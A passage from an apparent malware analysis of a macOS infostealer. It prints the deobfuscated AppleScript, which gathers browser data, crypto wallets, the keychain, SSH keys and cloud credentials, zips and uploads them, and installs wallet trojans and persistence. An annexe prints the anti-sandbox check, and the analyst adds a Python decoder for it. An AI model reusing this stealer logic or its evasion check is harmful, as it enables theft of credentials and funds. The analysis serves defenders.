set hwyksoup350 to ".sqlite" -- DECODED
if readFileContents(tmpStagingDir & (hwyksoup347 & hwyksoup348 & hwyksoup349 & hwyksoup350)) is equal to "" then
stealAppleNotes(tmpStagingDir)
end if
end try
end if
stealTelegramData(tmpStagingDir, appDataDir)
set hwyksoup351 to "Chrome" -- DECODED
set hwyksoup352 to "Google/Chrome/" -- DECODED
set hwyksoup353 to "Brave" -- DECODED
set hwyksoup354 to "BraveSo" -- DECODED
set hwyksoup355 to "ftware/" -- DECODED
set hwyksoup356 to "Brave-B" -- DECODED
set hwyksoup357 to "rowser/" -- DECODED
set hwyksoup358 to "Edge" -- DECODED
set hwyksoup359 to "Microsoft Edge/" -- DECODED
set hwyksoup360 to "Vivaldi" -- DECODED
set hwyksoup361 to "Vivaldi/" -- DECODED
set hwyksoup362 to "Opera" -- DECODED
set hwyksoup363 to "com.op" -- DECODED
set hwyksoup364 to "erasof" -- DECODED
set hwyksoup365 to "tware." -- DECODED
set hwyksoup366 to "Opera/" -- DECODED
set hwyksoup367 to "OperaGX" -- DECODED
set hwyksoup368 to "com.operasoft" -- DECODED
set hwyksoup369 to "ware.OperaGX/" -- DECODED
set hwyksoup370 to "Chrome Beta" -- DECODED
set hwyksoup371 to "Google/Chrome Beta/" -- DECODED
set hwyksoup372 to "Chrome Canary" -- DECODED
set hwyksoup373 to "Google/Chrome Canary" -- DECODED
set hwyksoup374 to "Chromium" -- DECODED
set hwyksoup375 to "Chromium/" -- DECODED
set hwyksoup376 to "Chrome Dev" -- DECODED
set hwyksoup377 to "Google/Chrome Dev/" -- DECODED
set hwyksoup378 to "Arc" -- DECODED
set hwyksoup379 to "Arc/User Data/" -- DECODED
set hwyksoup380 to "CocCoc" -- DECODED
set hwyksoup381 to "CocCoc/Browser/" -- DECODED
set firefoxBrowserList to {{hwyksoup351, appDataDir & hwyksoup352}, {hwyksoup353, appDataDir & (hwyksoup354 & hwyksoup355 & hwyksoup356 & hwyksoup357)}, {hwyksoup358, appDataDir & hwyksoup359}, {hwyksoup360, appDataDir & hwyksoup361}, {hwyksoup362, appDataDir & (hwyksoup363 & hwyksoup364 & hwyksoup365 & hwyksoup366)}, {hwyksoup367, appDataDir & (hwyksoup368 & hwyksoup369)}, {hwyksoup370, appDataDir & hwyksoup371}, {hwyksoup372, appDataDir & hwyksoup373}, {hwyksoup374, appDataDir & hwyksoup375}, {hwyksoup376, appDataDir & hwyksoup377}, {hwyksoup378, appDataDir & hwyksoup379}, {hwyksoup380, appDataDir & hwyksoup381}}
set hwyksoup382 to "Electrum" -- DECODED
set hwyksoup383 to "/.electrum/wallets/" -- DECODED
set hwyksoup384 to "Coinomi" -- DECODED
set hwyksoup385 to "Coinomi/wallets/" -- DECODED
set hwyksoup386 to "Exodus" -- DECODED
set hwyksoup387 to "Exodus/" -- DECODED
set hwyksoup388 to "Atomic" -- DECODED
set hwyksoup389 to "atomic/Lo" -- DECODED
set hwyksoup390 to "cal Stora" -- DECODED
set hwyksoup391 to "ge/leveld" -- DECODED
set hwyksoup392 to "b/" -- DECODED
set hwyksoup393 to "Wasabi" -- DECODED
set hwyksoup394 to "/.walle" -- DECODED
set hwyksoup395 to "twasabi" -- DECODED
set hwyksoup396 to "/client" -- DECODED
set hwyksoup397 to "/Wallet" -- DECODED
set hwyksoup398 to "s/" -- DECODED
set hwyksoup399 to "Ledger_Live" -- DECODED
set hwyksoup400 to "Ledger Live/" -- DECODED
set hwyksoup401 to "Monero" -- DECODED
set hwyksoup402 to "/Monero/wallets/" -- DECODED
set hwyksoup403 to "Bitcoin_Core" -- DECODED
set hwyksoup404 to "Bitcoin/wallets/" -- DECODED
set hwyksoup405 to "Litecoin_Core" -- DECODED
set hwyksoup406 to "Litecoin/wallets/" -- DECODED
set hwyksoup407 to "Dash_Core" -- DECODED
set hwyksoup408 to "DashCore/wallets/" -- DECODED
set hwyksoup409 to "Electrum_LTC" -- DECODED
set hwyksoup410 to "/.ele" -- DECODED
set hwyksoup411 to "ctrum" -- DECODED
set hwyksoup412 to "-ltc/" -- DECODED
set hwyksoup413 to "walle" -- DECODED
set hwyksoup414 to "ts/" -- DECODED
set hwyksoup415 to "Electron_Cash" -- DECODED
set hwyksoup416 to "/.elec" -- DECODED
set hwyksoup417 to "tron-c" -- DECODED
set hwyksoup418 to "ash/wa" -- DECODED
set hwyksoup419 to "llets/" -- DECODED
set hwyksoup420 to "Guarda" -- DECODED
set hwyksoup421 to "Guarda/" -- DECODED
set hwyksoup422 to "Dogecoin_Core" -- DECODED
set hwyksoup423 to "Dogecoin/wallets/" -- DECODED
set hwyksoup424 to "Trezor_Suite" -- DECODED
set hwyksoup425 to "@trezor" -- DECODED
set hwyksoup426 to "/suite-" -- DECODED
set hwyksoup427 to "desktop/" -- DECODED
set hwyksoup428 to "Sparrow" -- DECODED
set hwyksoup429 to "/.sparrow/wallets/" -- DECODED
set chromiumBrowserList to {{hwyksoup382, homeDir & hwyksoup383}, {hwyksoup384, appDataDir & hwyksoup385}, {hwyksoup386, appDataDir & hwyksoup387}, {hwyksoup388, appDataDir & (hwyksoup389 & hwyksoup390 & hwyksoup391 & hwyksoup392)}, {hwyksoup393, homeDir & (hwyksoup394 & hwyksoup395 & hwyksoup396 & hwyksoup397 & hwyksoup398)}, {hwyksoup399, appDataDir & hwyksoup400}, {hwyksoup401, homeDir & hwyksoup402}, {hwyksoup403, appDataDir & hwyksoup404}, {hwyksoup405, appDataDir & hwyksoup406}, {hwyksoup407, appDataDir & hwyksoup408}, {hwyksoup409, homeDir & (hwyksoup410 & hwyksoup411 & hwyksoup412 & hwyksoup413 & hwyksoup414)}, {hwyksoup415, homeDir & (hwyksoup416 & hwyksoup417 & hwyksoup418 & hwyksoup419)}, {hwyksoup420, appDataDir & hwyksoup421}, {hwyksoup422, appDataDir & hwyksoup423}, {hwyksoup424, appDataDir & (hwyksoup425 & hwyksoup426 & hwyksoup427)}, {hwyksoup428, homeDir & hwyksoup429}}
set hwyksoup430 to "Binance/app" -- DECODED
set hwyksoup431 to "-store.json" -- DECODED
set hwyksoup432 to "deskwallets" -- DECODED
set hwyksoup433 to "/Binance/ap" -- DECODED
set hwyksoup434 to "p-store.json" -- DECODED
copyFile(appDataDir & (hwyksoup430 & hwyksoup431), tmpStagingDir & (hwyksoup432 & hwyksoup433 & hwyksoup434))
set hwyksoup435 to "@tonkeeper" -- DECODED
set hwyksoup436 to "/desktop/c" -- DECODED
set hwyksoup437 to "onfig.json" -- DECODED
set hwyksoup438 to "deskwall" -- DECODED
set hwyksoup439 to "ets/TonK" -- DECODED
set hwyksoup440 to "eeper/co" -- DECODED
set hwyksoup441 to "nfig.json" -- DECODED
copyFile(appDataDir & (hwyksoup435 & hwyksoup436 & hwyksoup437), tmpStagingDir & (hwyksoup438 & hwyksoup439 & hwyksoup440 & hwyksoup441))
set hwyksoup442 to "Keycha" -- DECODED
set hwyksoup443 to "ins/lo" -- DECODED
set hwyksoup444 to "gin.ke" -- DECODED
set hwyksoup445 to "ychain" -- DECODED
set hwyksoup446 to "-db" -- DECODED
set hwyksoup447 to "login.keychain-db" -- DECODED
copyFile(appSupportDir & (hwyksoup442 & hwyksoup443 & hwyksoup444 & hwyksoup445 & hwyksoup446), tmpStagingDir & hwyksoup447)
set hwyksoup448 to "/.ssh/" -- DECODED
set hwyksoup449 to "FileGrabber/ssh/" -- DECODED
copyDirectoryRecursive(homeDir & hwyksoup448, tmpStagingDir & hwyksoup449)
set hwyksoup450 to "/.aws/credentials" -- DECODED
set hwyksoup451 to "FileGrabb" -- DECODED
set hwyksoup452 to "er/aws/cr" -- DECODED
set hwyksoup453 to "edentials" -- DECODED
copyFile(homeDir & hwyksoup450, tmpStagingDir & (hwyksoup451 & hwyksoup452 & hwyksoup453))
set hwyksoup454 to "/.aws/config" -- DECODED
set hwyksoup455 to "FileG" -- DECODED
set hwyksoup456 to "rabbe" -- DECODED
set hwyksoup457 to "r/aws" -- DECODED
set hwyksoup458 to "/conf" -- DECODED
set hwyksoup459 to "ig" -- DECODED
copyFile(homeDir & hwyksoup454, tmpStagingDir & (hwyksoup455 & hwyksoup456 & hwyksoup457 & hwyksoup458 & hwyksoup459))
set hwyksoup460 to "/.config/gcloud/a" -- DECODED
set hwyksoup461 to "pplication_defaul" -- DECODED
set hwyksoup462 to "t_credentials.json" -- DECODED
set hwyksoup463 to "FileGrab" -- DECODED
set hwyksoup464 to "ber/gclo" -- DECODED
set hwyksoup465 to "ud/crede" -- DECODED
set hwyksoup466 to "ntials.j" -- DECODED
set hwyksoup467 to "son" -- DECODED
copyFile(homeDir & (hwyksoup460 & hwyksoup461 & hwyksoup462), tmpStagingDir & (hwyksoup463 & hwyksoup464 & hwyksoup465 & hwyksoup466 & hwyksoup467))
set hwyksoup468 to "/.config/g" -- DECODED
set hwyksoup469 to "cloud/cred" -- DECODED
set hwyksoup470 to "entials.db" -- DECODED
set hwyksoup471 to "FileGrab" -- DECODED
set hwyksoup472 to "ber/gclo" -- DECODED
set hwyksoup473 to "ud/crede" -- DECODED
set hwyksoup474 to "ntials.db" -- DECODED
copyFile(homeDir & (hwyksoup468 & hwyksoup469 & hwyksoup470), tmpStagingDir & (hwyksoup471 & hwyksoup472 & hwyksoup473 & hwyksoup474))
set hwyksoup475 to "/.azure/" -- DECODED
set hwyksoup476 to "FileGrabber/azure/" -- DECODED
copyDirectoryRecursive(homeDir & hwyksoup475, tmpStagingDir & hwyksoup476)
set hwyksoup477 to "/.docker/config.json" -- DECODED
set hwyksoup478 to "FileGrabbe" -- DECODED
set hwyksoup479 to "r/docker/c" -- DECODED
set hwyksoup480 to "onfig.json" -- DECODED
copyFile(homeDir & hwyksoup477, tmpStagingDir & (hwyksoup478 & hwyksoup479 & hwyksoup480))
set hwyksoup481 to "/.file" -- DECODED
set hwyksoup482 to "zilla/" -- DECODED
set hwyksoup483 to "sitema" -- DECODED
set hwyksoup484 to "nager." -- DECODED
set hwyksoup485 to "xml" -- DECODED
set hwyksoup486 to "FileGrabb" -- DECODED
set hwyksoup487 to "er/filezi" -- DECODED
set hwyksoup488 to "lla/sitem" -- DECODED
set hwyksoup489 to "anager.xml" -- DECODED
copyFile(homeDir & (hwyksoup481 & hwyksoup482 & hwyksoup483 & hwyksoup484 & hwyksoup485), tmpStagingDir & (hwyksoup486 & hwyksoup487 & hwyksoup488 & hwyksoup489))
set hwyksoup490 to "/.filezil" -- DECODED
set hwyksoup491 to "la/recent" -- DECODED
set hwyksoup492 to "servers.x" -- DECODED
set hwyksoup493 to "ml" -- DECODED
set hwyksoup494 to "FileGrabber/f" -- DECODED
set hwyksoup495 to "ilezilla/rece" -- DECODED
set hwyksoup496 to "ntservers.xml" -- DECODED
copyFile(homeDir & (hwyksoup490 & hwyksoup491 & hwyksoup492 & hwyksoup493), tmpStagingDir & (hwyksoup494 & hwyksoup495 & hwyksoup496))
set hwyksoup497 to "discord" -- DECODED
set hwyksoup498 to "/Local " -- DECODED
set hwyksoup499 to "Storage" -- DECODED
set hwyksoup500 to "/leveld" -- DECODED
set hwyksoup501 to "b/" -- DECODED
set hwyksoup502 to "FileGrabber/Di" -- DECODED
set hwyksoup503 to "scord/leveldb/" -- DECODED
copyDirectoryRecursive(appDataDir & (hwyksoup497 & hwyksoup498 & hwyksoup499 & hwyksoup500 & hwyksoup501), tmpStagingDir & (hwyksoup502 & hwyksoup503))
set hwyksoup504 to "Containers" -- DECODED
set hwyksoup505 to "/Stickies/" -- DECODED
set hwyksoup506 to "Data/Libra" -- DECODED
set hwyksoup507 to "ry/Stickie" -- DECODED
set hwyksoup508 to "s/" -- DECODED
set hwyksoup509 to "FileG" -- DECODED
set hwyksoup510 to "rabbe" -- DECODED
set hwyksoup511 to "r/Sti" -- DECODED
set hwyksoup512 to "ckies/" -- DECODED
copyDirectoryRecursive(appSupportDir & (hwyksoup504 & hwyksoup505 & hwyksoup506 & hwyksoup507 & hwyksoup508), tmpStagingDir & (hwyksoup509 & hwyksoup510 & hwyksoup511 & hwyksoup512))
set hwyksoup513 to "/.zsh_history" -- DECODED
set hwyksoup514 to "FileGrabber" -- DECODED
set hwyksoup515 to "/zsh_history" -- DECODED
copyFile(homeDir & hwyksoup513, tmpStagingDir & (hwyksoup514 & hwyksoup515))
set hwyksoup516 to "username" -- DECODED
writeToFile(currentUser, tmpStagingDir & hwyksoup516)
set hwyksoup517 to "Firefox" -- DECODED
set hwyksoup518 to "Firefox/Profiles/" -- DECODED
set hwyksoup519 to "Waterfox" -- DECODED
set hwyksoup520 to "Waterfox/Profiles/" -- DECODED
set crvowfmlc to {{hwyksoup517, appDataDir & hwyksoup518}, {hwyksoup519, appDataDir & hwyksoup520}}
repeat with piiqmpdi in crvowfmlc
try
stealFirefoxBrowserData(item 1 of piiqmpdi, item 2 of piiqmpdi, tmpStagingDir, buildFlag)
end try
end repeat
repeat with nwsmkuirbv in chromiumBrowserList
set hwyksoup521 to "deskwallets/" -- DECODED
copyDirectoryRecursive(item 2 of nwsmkuirbv, tmpStagingDir & hwyksoup521 & item 1 of nwsmkuirbv)
end repeat
stealChromiumBrowserData(tmpStagingDir, firefoxBrowserList, buildFlag)
set hwyksoup522 to "ditto -" -- DECODED
set hwyksoup523 to "c -k --" -- DECODED
set hwyksoup524 to "sequest" -- DECODED
set hwyksoup525 to "erRsrc " -- DECODED
set hwyksoup526 to " /tmp/out.zip" -- DECODED
do shell script (hwyksoup522 & hwyksoup523 & hwyksoup524 & hwyksoup525) & tmpStagingDir & hwyksoup526
uploadLargeFile(exfilUrl, configData, buildId, clientId, chunkNum)
try
set hwyksoup527 to "rm -rf " -- DECODED
do shell script hwyksoup527 & tmpStagingDir
end try
try
set hwyksoup528 to "rm -f /tmp/out.zip" -- DECODED
do shell script hwyksoup528
end try
try
set hwyksoup529 to "rm -f /tmp/chunk_*" -- DECODED
do shell script hwyksoup529
end try
if storedPassword is not equal to "" then
trojanizeLedger(homeDir, storedPassword, c2Url)
trojanizeTrezor(homeDir, storedPassword, c2Url)
trojanizeExodus(homeDir, storedPassword, c2Url)
end if
try
installPersistence(homeDir, storedPassword, c2Url)
end try
end run
'&
Annexe B: Initial Environment Check Command
The 2,906-byte AppleScript command that runs first to validate the target environment. Its exit code (0 = success) is what the dropper uses to derive the XOR decryption key for the main payload, so the check doubles as an anti-sandbox gate: if the environment looks virtualised, the key is never derived correctly.
osascript -e '
on qbibeltf(hadzhi, uytcjk)
set firuqu to ""
set miwwbftx to 0
repeat with mivqor from 1 to count of hadzhi
set miwwbftx to (miwwbftx + (item mivqor of hadzhi)) mod 9999
set firuqu to firuqu & (character id ((item mivqor of hadzhi) - (item mivqor of uytcjk)))
end repeat
return firuqu
end qbibeltf
set eyvevhkvz to qbibeltf({194, 208, 223, 249, 180, 342, 320, 316, 196, 199, 156, 197, 308, 158, 196}, {79, 87, 108, 133, 79, 233, 225, 204, 82, 88, 54, 92, 200, 57, 82}) & " " & qbibeltf({241, 205, 256, 255, 219, 306, 244, 326, 174, 147, 168, 215, 237, 270, 305, 264}, {158, 125, 179, 154, 110, 195, 130, 205, 106, 50, 52, 118, 153, 149, 193, 163})
set tqbxvgfjop to qbibeltf({194, 208, 223, 249, 180, 342, 320, 316, 196, 199, 156, 197, 308, 158, 196}, {79, 87, 108, 133, 79, 233, 225, 204, 82, 88, 54, 92, 200, 57, 82}) & " " & qbibeltf({256, 275, 188, 170, 186, 278, 249, 152, 215, 170, 171, 183, 326, 336, 220, 318, 340, 320}, {173, 195, 116, 73, 72, 178, 130, 55, 101, 69, 103, 86, 210, 239, 136, 197, 228, 219})
set tydmfynqqy to do shell script eyvevhkvz
set ymqldgr to do shell script tqbxvgfjop
if ymqldgr contains qbibeltf({148, 124, 141, 275, 235, 195, 309, 166, 175, 246}, {58, 54, 89, 207, 151, 121, 227, 98, 98, 176}) then
do shell script "exit 0"
return
end if
set gxvbknwo to {qbibeltf({208, 224, 134, 300}, {127, 155, 57, 215}), qbibeltf({249, 292, 328, 237, 296, 173}, {163, 215, 209, 140, 182, 72}), qbibeltf({313, 272, 231}, {238, 186, 154})}
set fqjwud to {qbibeltf({302, 193, 135, 291, 299, 238, 330, 169, 276, 250}, {212, 142, 86, 221, 227, 150, 241, 88, 228, 176}), qbibeltf({160, 151, 146, 211, 224, 157, 235, 157, 196, 138, 247, 177}, {93, 103, 91, 127, 171, 109, 179, 73, 125, 89, 173, 127}), qbibeltf({270, 255, 150, 260, 201, 260, 208, 264, 297, 271, 227, 170}, {203, 207, 100, 176, 124, 210, 118, 198, 225, 183, 171, 115}), qbibeltf({260, 273, 338, 224, 120, 272, 187, 256, 179, 284, 258, 260, 350}, {193, 169, 233, 112, 62, 240, 102, 146, 72, 174, 147, 141, 240}), qbibeltf({196, 215, 225, 188, 351, 158, 300, 245, 333, 273, 244, 108}, {123, 105, 109, 87, 243, 126, 233, 134, 219, 172, 212, 58}), qbibeltf({243, 218, 337, 260, 279, 208, 338, 199, 309, 268, 290, 343, 346, 346, 272}, {157, 113, 223, 144, 162, 111, 230, 167, 232, 171, 191, 239, 241, 236, 171}), qbibeltf({137, 341, 328, 302, 338, 213, 168, 287, 281, 319}, {51, 236, 214, 186, 221, 116, 60, 210, 184, 220}), qbibeltf({153, 195, 223, 217, 266, 270, 271, 219, 231}, {113, 109, 118, 103, 150, 153, 174, 111, 190})}
set dirzmgemnu to false
repeat with scclfiwe in gxvbknwo
if tydmfynqqy contains scclfiwe then
set dirzmgemnu to true
exit repeat
end if
end repeat
if not dirzmgemnu then
repeat with scclfiwe in fqjwud
if ymqldgr contains scclfiwe then
set dirzmgemnu to true
exit repeat
end if
end repeat
end if
if dirzmgemnu then
do shell script "exit 100"
else
do shell script "exit 0"
end if
'
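Every string in this check is hidden with the same trick: each plaintext character is the difference of two paired numbers, recovered by the qbibeltf handler. The Python below is an added example written for this write-up, not tooling from the sample or the original analysis; the number pairs are copied verbatim from the script above, while the function names, the dictionary keys and the sample system_profiler lines are my own constructions. It ports the decoder, recovers the two commands and both marker lists, and replays the script's branching so a defender can see exactly which system_profiler text would make the check abort.

```python
# Python port of the qbibeltf string decoder from the Annexe B check script.
# Added example for this write-up, not the sample's own tooling. The number
# pairs are copied verbatim from the script; everything else is constructed.

def qbibeltf(hadzhi, uytcjk):
    """Each plaintext character is chr(hadzhi[i] - uytcjk[i]).
    The running mod-9999 sum (miwwbftx) in the original never reaches
    the output, so it is omitted here."""
    return "".join(chr(a - b) for a, b in zip(hadzhi, uytcjk))

# Number pairs copied from the script, in the order they appear.
SYSTEM_PROFILER = ([194, 208, 223, 249, 180, 342, 320, 316, 196, 199, 156, 197, 308, 158, 196],
                   [79, 87, 108, 133, 79, 233, 225, 204, 82, 88, 54, 92, 200, 57, 82])
MEMORY_TYPE = ([241, 205, 256, 255, 219, 306, 244, 326, 174, 147, 168, 215, 237, 270, 305, 264],
               [158, 125, 179, 154, 110, 195, 130, 205, 106, 50, 52, 118, 153, 149, 193, 163])
HARDWARE_TYPE = ([256, 275, 188, 170, 186, 278, 249, 152, 215, 170, 171, 183, 326, 336, 220, 318, 340, 320],
                 [173, 195, 116, 73, 72, 178, 130, 55, 101, 69, 103, 86, 210, 239, 136, 197, 228, 219])
EARLY_EXIT_MARKER = ([148, 124, 141, 275, 235, 195, 309, 166, 175, 246],
                     [58, 54, 89, 207, 151, 121, 227, 98, 98, 176])
MEMORY_MARKERS = [  # gxvbknwo: matched against the SPMemoryDataType output
    ([208, 224, 134, 300], [127, 155, 57, 215]),
    ([249, 292, 328, 237, 296, 173], [163, 215, 209, 140, 182, 72]),
    ([313, 272, 231], [238, 186, 154]),
]
HARDWARE_MARKERS = [  # fqjwud: matched against the SPHardwareDataType output
    ([302, 193, 135, 291, 299, 238, 330, 169, 276, 250], [212, 142, 86, 221, 227, 150, 241, 88, 228, 176]),
    ([160, 151, 146, 211, 224, 157, 235, 157, 196, 138, 247, 177], [93, 103, 91, 127, 171, 109, 179, 73, 125, 89, 173, 127]),
    ([270, 255, 150, 260, 201, 260, 208, 264, 297, 271, 227, 170], [203, 207, 100, 176, 124, 210, 118, 198, 225, 183, 171, 115]),
    ([260, 273, 338, 224, 120, 272, 187, 256, 179, 284, 258, 260, 350], [193, 169, 233, 112, 62, 240, 102, 146, 72, 174, 147, 141, 240]),
    ([196, 215, 225, 188, 351, 158, 300, 245, 333, 273, 244, 108], [123, 105, 109, 87, 243, 126, 233, 134, 219, 172, 212, 58]),
    ([243, 218, 337, 260, 279, 208, 338, 199, 309, 268, 290, 343, 346, 346, 272], [157, 113, 223, 144, 162, 111, 230, 167, 232, 171, 191, 239, 241, 236, 171]),
    ([137, 341, 328, 302, 338, 213, 168, 287, 281, 319], [51, 236, 214, 186, 221, 116, 60, 210, 184, 220]),
    ([153, 195, 223, 217, 266, 270, 271, 219, 231], [113, 109, 118, 103, 150, 153, 174, 111, 190]),
]

def decode_check_script():
    """Recover the two commands and the marker lists in plaintext."""
    sp = qbibeltf(*SYSTEM_PROFILER)
    return {
        "memory_cmd": sp + " " + qbibeltf(*MEMORY_TYPE),
        "hardware_cmd": sp + " " + qbibeltf(*HARDWARE_TYPE),
        "early_exit_marker": qbibeltf(*EARLY_EXIT_MARKER),
        "memory_markers": [qbibeltf(*p) for p in MEMORY_MARKERS],
        "hardware_markers": [qbibeltf(*p) for p in HARDWARE_MARKERS],
    }

def _contains(haystack, needle):
    # AppleScript's `contains` ignores case unless wrapped in `considering case`,
    # so the replay must compare case-insensitively too.
    return needle.lower() in haystack.lower()

def simulate_exit_code(memory_output, hardware_output):
    """Replay the script's branching over system_profiler text and return
    the value it passes to `exit`: 0 (proceed) or 100 (abort). The early
    marker is tested first and short-circuits to 0 regardless of the rest."""
    d = decode_check_script()
    if _contains(hardware_output, d["early_exit_marker"]):
        return 0
    if any(_contains(memory_output, m) for m in d["memory_markers"]):
        return 100
    if any(_contains(hardware_output, m) for m in d["hardware_markers"]):
        return 100
    return 0

if __name__ == "__main__":
    for name, value in decode_check_script().items():
        print(f"{name}: {value}")
    # Constructed sample outputs, not captures from a real machine.
    print("vm-like    ->", simulate_exit_code("", "Hardware:\n  Chip: Unknown\n"))
    print("bare-metal ->", simulate_exit_code("", "Hardware:\n  Chip: Apple M2\n"))
```

The decoded marker lists are the practical output: an analysis VM whose SPHardwareDataType output reports one of those strings (or whose SPMemoryDataType output names its hypervisor) will make this sample take the abort path and never decrypt its payload.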